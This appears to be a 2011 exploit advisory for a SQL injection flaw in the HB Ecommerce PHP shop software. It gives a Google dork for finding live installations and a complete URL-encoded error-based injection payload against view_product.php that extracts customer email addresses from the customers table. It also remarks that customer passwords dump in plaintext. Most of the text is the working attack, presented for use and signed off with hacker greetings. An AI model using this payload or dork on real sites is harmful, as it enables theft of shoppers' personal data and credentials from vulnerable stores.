-------------[ HB ECOMMERCE SQL Injection Vulnerability ]--------------------------------------------------------------------------------------- |
------------------------------------------------------------------------ |
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ] |
[+] Google Dork: intext:'supplied by hb ecommerce' |
[+] Date: 26.05.2011 |
[+] Author: takeshix |
[+] Author Contact: takeshix@safe-mail.net |
[+] Software Link: http://www.hbecommerce.co.uk/ |
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64 |
[+] System: PHP |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
vulnerable url: |
/templates1/view_product.php?product=3D |
Example: |
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION] |
Get an Mail from the Customers Table: |
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL= |
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%= |
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2= |
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2= |
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%= |
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2= |
9a%29%20 |
note: customer passwords dumped in plaintext! |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
Greez to: esc0bar | Someone | takedown |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
--------------------------[ hacktivistas ]------------------------------
No comments:
Post a Comment